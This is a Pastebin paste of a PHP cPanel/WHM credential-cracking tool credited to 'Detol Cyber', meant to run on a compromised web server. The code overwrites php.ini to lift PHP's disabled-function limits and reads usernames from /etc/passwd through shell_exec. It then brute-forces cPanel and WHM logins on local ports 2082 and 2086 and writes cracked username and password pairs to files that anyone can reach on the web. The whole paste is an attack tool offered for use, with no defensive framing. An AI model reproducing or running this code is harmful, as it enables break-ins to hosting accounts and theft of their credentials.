Advertisement
Guest User

dada

a guest
Aug 3rd, 2016
135
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.78 KB | None | 0 0
  1.  
  2. <title>--==[[RR CPanel/WHM cracker by Detol Cyber]]==--</title>
  3. <body bgcolor=black>
  4. <p h3 style="text-align:center"><div align=center><table width=100%><tr><td align=center>
  5. <font size=6 color=white face="comic sans ms"> RR</font><font size=5 color=white face="comic sans ms"> CPanel/WHM</font><font size=5 color=white face="comic sans ms"> cracker By </font><font size=5 color=white face="comic sans ms">Detol Cyber</font><font size=6 color=white face="comic sans ms"></font>
  6. <br><font
  7. color="green" face="comic sans ms"size="1">
  8. <font color=white><b>-==[[Greetz to]]==--</font><br> <font color=green size=2> De Vinclous | Cybertaziex | Team Seven Crew | -- <br>
  9.  
  10. <font color=white>--==[[Dedicated to]]==--</font>
  11. <br># DeTol Cyber And N'cex Machintoz #</table>
  12.  
  13. </table><div align=center><font color=white size=4 face='comic sans ms'>>>>&nbsp<a href="<?php echo '?ini'; ?>"><font color=white size=3>rUn php.1n1 first of 4ll</b></font></a><font color=white size=4 face='comic sans ms'>&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp<a href="<?php echo '?/var/mail'; ?>"><font color=white size=3>Us3rN4m3 ExTracTor</font></a>&nbsp&nbsp&nbsp&nbsp<?php
  14.  
  15. $r=gethostbyname($_SERVER["HTTP_HOST"]);
  16. $s="<a href=http://".$r.":2082><font color=white size=4 face='comic sans ms'>link for cpanel login</a>";
  17. echo $s;
  18. ?>&nbsp<<<<br>
  19.  
  20.  
  21. <?php
  22.  
  23. if(isset($_GET['ini']))
  24. {
  25. $r=@fopen('php.ini',w);
  26. $s=" disable_functions =none ";
  27. $t=@fwrite($r,$s);
  28.  
  29. echo "<p><a href=php.ini><font color=white size=4 face='comic sans ms'>link to php.ini</a>";
  30.  
  31. }
  32.  
  33. ?>
  34. <?php
  35. if(isset($_GET['/var/mail']))
  36. {
  37.  
  38. ?> <form method=post><textarea style="background:black;color:white" name=pass rows=20 cols=20 ><?php
  39. $r="cat /etc/passwd | cut -d \":\" -f 1";
  40. echo shell_exec($r); ?></textarea><br><input type=submit name=subm value="click untuk Copy all usernames to username filed" /></form>
  41. <?php
  42. }
  43. ?>
  44. <form method=post><div align=center><font color=red size=3 face='comic sans ms'>/--------------------------------------------\<br></font><div align=center><font color=white size=3 face='comic sans ms'>&nbsp{&nbsp&nbsp&nbsp Usernames&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp Passwords &nbsp&nbsp&nbsp&nbsp&nbsp }</font>
  45. </table><br><div align=center><font color=green size=3 face='comic sans ms'>\-------------------------------------------/</font><br><table><font color=white size=3 face="comic sans ms">Attack =><select name="op">
  46. <option name="op" value="cp">CPanel</option>
  47. <option name="op" value="whm">WHMPanel</option></table><br>
  48. <?php
  49. if(isset($_POST['subm']))
  50. {
  51. $pa=$_POST["pass"];
  52. ?>
  53. <textarea style="background:black;color:white" rows=25 cols=25 name=usernames ><?php echo $pa; ?></textarea>
  54. <?php
  55. }
  56. else{
  57. ?>
  58. <textarea style="background:black;color:white" rows=25 cols=25 name=usernames ></textarea>
  59.  
  60. <?php }
  61.  
  62. ?>
  63.  
  64. &nbsp <textarea style="background:black;color:white" rows=25 cols=25 name=passwords></textarea><br><br>
  65. <input type=submit name=cracking value="Mulai hex this shit XD" /></form><br>
  66. <?php
  67. error_reporting(0);
  68. $connect_timeout=5;
  69. set_time_limit(0);
  70. $submit=$_POST['submit'];
  71. $userl=$_POST['usernames'];
  72. $passl=$_POST['passwords'];
  73. $attack=$_POST['op'];
  74. $target = "localhost";
  75. if(isset($_POST['cracking']))
  76. {
  77. if($userl!=="" && $passl!=="")
  78. {
  79. if($_POST["op"]=="cp")
  80. {
  81. @fopen('cracked_cpanel.txt','a');
  82. echo "Tunggu Sebentar ^_^ sekarang kita menyerang cpanels .... silahkan menunggu sampai akhir proses \n";
  83. echo "<p><a href=cracked_cpanel.txt><font color=white size=2 face='comic sans ms'>di sini adalah link untuk file, yang akan menyimpan username cpanel Cracked </font></a></p><br>";
  84.  
  85. }
  86. elseif($_POST["op"]=="whm")
  87. {
  88. @fopen('cracked_whm.txt','a');
  89. echo "Tunggu Sebentar ^_^ sekarang kita menyerang cpanels whm .... silahkan menunggu sampai akhir proses";
  90. echo "<p><a href=cracked_whm.txt><font color=white size=2 face='comic sans ms'>di sini adalah link untuk file, yang akan menyimpan username cpanel whm Cracked dengan </font></a></p><br>";
  91. }
  92.  
  93. function cpanel($host,$user,$pass,$timeout){
  94. $ch = curl_init();
  95. curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
  96. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  97. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  98. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  99. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  100. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  101. $data = curl_exec($ch);
  102. if ( curl_errno($ch) == 0 ){
  103. echo "<table width=100% ><tr><td align=center><b><font color=white size=2>==================================</font><font color=red size=2> $user </font><font color=white size=2>cracked with </font><font color=red size=2> $pass </font> <font color=white size=2>==================================</font></b></td></tr></table>";
  104. $x=$user." ".$pass ." \n" ;
  105. $y=@fopen('cracked_cpanel.txt','a+');
  106. @fwrite($y,$x);
  107.  
  108. }
  109.  
  110. curl_close($ch);}
  111.  
  112. $userlist=explode("\n",$userl);
  113. $passlist=explode("\n",$passl);
  114.  
  115. foreach ($userlist as $user) {
  116. $finaluser = trim($user);
  117. foreach ($passlist as $password ) {
  118. $finalpass = trim($password);
  119.  
  120. if ($attack == "cp")
  121. {
  122. echo "<table width=80% ><tr><td align=center><b><font color=red size=1>Attacking user $user with password $password </font></td></tr></table>";
  123. cpanel($target,$finaluser,$finalpass,$connect_timeout);
  124.  
  125. }
  126. }
  127.  
  128. }
  129.  
  130. function whm($host,$user,$pass,$timeout){
  131. $ch = curl_init();
  132. curl_setopt($ch, CURLOPT_URL, "http://$host:2086");
  133. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  134. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  135. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  136. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  137. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  138. $data = curl_exec($ch);
  139. if ( curl_errno($ch) == 0 ){
  140. echo "<table width=100% ><tr><td align=center><b><font color=white size=2>==================================</font><font color=red size=2> $user </font><font color=white size=2>cracked with </font><font color=red size=2> $pass </font> <font color=white size=2>==================================</font></b></td></tr></table>";
  141.  
  142. $x=$user." ".$pass ." \n" ;
  143. $y=@fopen('cracked_whm.txt','a+');
  144. @fwrite($y,$x);
  145.  
  146.  
  147. }
  148.  
  149.  
  150. curl_close($ch);}
  151. $userlist=explode("\n",$userl);
  152. $passlist=explode("\n",$passl);
  153.  
  154. foreach ($userlist as $user) {
  155. $finaluser = trim($user);
  156. foreach ($passlist as $password ) {
  157. $finalpass = trim($password);
  158.  
  159. if ($attack == "whm")
  160. {
  161. echo "<table width=80% ><tr><td align=center><b><font color=white size=2>user under attack is $user </font></td></tr></table>";
  162. whm($target,$finaluser,$finalpass,$connect_timeout);
  163. }
  164. }
  165. }
  166. }
  167. elseif($userl=="")
  168. {
  169. echo "what are you doing :( , you have left userlist field empty";
  170.  
  171. }
  172. elseif($passl=="")
  173. {
  174.  
  175. echo "bhai ji :( ... please put passwords in paasword list field";
  176. }
  177. }
  178. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement